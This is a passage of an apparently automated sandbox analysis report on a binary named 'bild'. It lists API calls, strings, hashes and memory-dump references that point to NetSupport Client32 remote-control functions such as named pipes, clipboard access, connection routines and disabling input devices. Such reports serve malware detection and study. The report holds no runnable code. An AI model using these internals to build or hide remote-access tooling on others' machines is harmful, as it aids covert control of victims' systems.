                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                    • GetLastError.KERNEL32 ref: 110F3470
                                                                                    • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                    • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                    • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                    • pSD, xrefs: 110F3415
                                                                                    • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                    • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                    • API String ID: 3134831419-838605531
                                                                                    • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                    • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                    • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                    • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                    • API String ID: 0-293745777
                                                                                    • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                    • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                    • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                    • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                    • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                      • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                      • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                      • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                      • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                      • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                      • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                      • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                      • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                      • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                      • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                    • String ID: NSMClassList$NSMFindClassEvent
                                                                                    • API String ID: 1622498684-2883797795
                                                                                    • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                    • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                    • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                    • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                    APIs
                                                                                      • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                      • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                    • _memset.LIBCMT ref: 1115B266
                                                                                    • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                    • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                    • GetDesktopWindow.USER32 ref: 1115B309
                                                                                    • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2935161463-0
                                                                                    • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                    • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                    • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                    • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                    • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                    • API String ID: 1096595926-1306570422
                                                                                    • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                    • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                    • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                    • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                    APIs
                                                                                      • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                    • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                      • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                      • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                    • wsprintfA.USER32 ref: 1100548D
                                                                                    • DeleteObject.GDI32(?), ref: 110054E2
                                                                                    • DeleteObject.GDI32(?), ref: 110054EB
                                                                                    • SelectObject.GDI32(?,?), ref: 11005502
                                                                                    • DeleteObject.GDI32(?), ref: 11005508
                                                                                    • DeleteDC.GDI32(?), ref: 1100550E
                                                                                    • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                    • DeleteObject.GDI32(?), ref: 11005528
                                                                                    • DeleteDC.GDI32(?), ref: 1100552E
                                                                                    • DeleteObject.GDI32(?), ref: 1100553F
                                                                                    • DeleteObject.GDI32(?), ref: 1100556A
                                                                                    • DeleteObject.GDI32(?), ref: 11005588
                                                                                    • DeleteObject.GDI32(?), ref: 11005591
                                                                                    • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                    • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                    • API String ID: 2789700732-770455996
                                                                                    • Opcode ID: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                    • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                    • Opcode Fuzzy Hash: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                    • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                    APIs
                                                                                    • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                    • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                    • _memset.LIBCMT ref: 110152E5
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                    • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                    • EndPath.GDI32(00000000), ref: 11015357
                                                                                    • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                    • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                    • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                    • DeleteObject.GDI32(?), ref: 11015436
                                                                                    • DeleteObject.GDI32(?), ref: 1101543F
                                                                                    • DeleteObject.GDI32(?), ref: 11015448
                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                    • DeleteObject.GDI32(?), ref: 1101545B
                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                    • EndPaint.USER32(?,?), ref: 11015479
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3702029449-0
                                                                                    • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                    • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                    • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                    • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                    • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                    • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                    • wsprintfA.USER32 ref: 110FF5BE
                                                                                    • _memset.LIBCMT ref: 110FF5CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                    • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                    • API String ID: 137837830-2801557662
                                                                                    • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                    • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                    • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                    • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • wsprintfA.USER32 ref: 110EB1B8
                                                                                    • GetTickCount.KERNEL32 ref: 110EB212
                                                                                    • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                    • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                    • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                    • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                    • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                    • API String ID: 3451743168-2289091950
                                                                                    • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                    • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                    • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                    • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
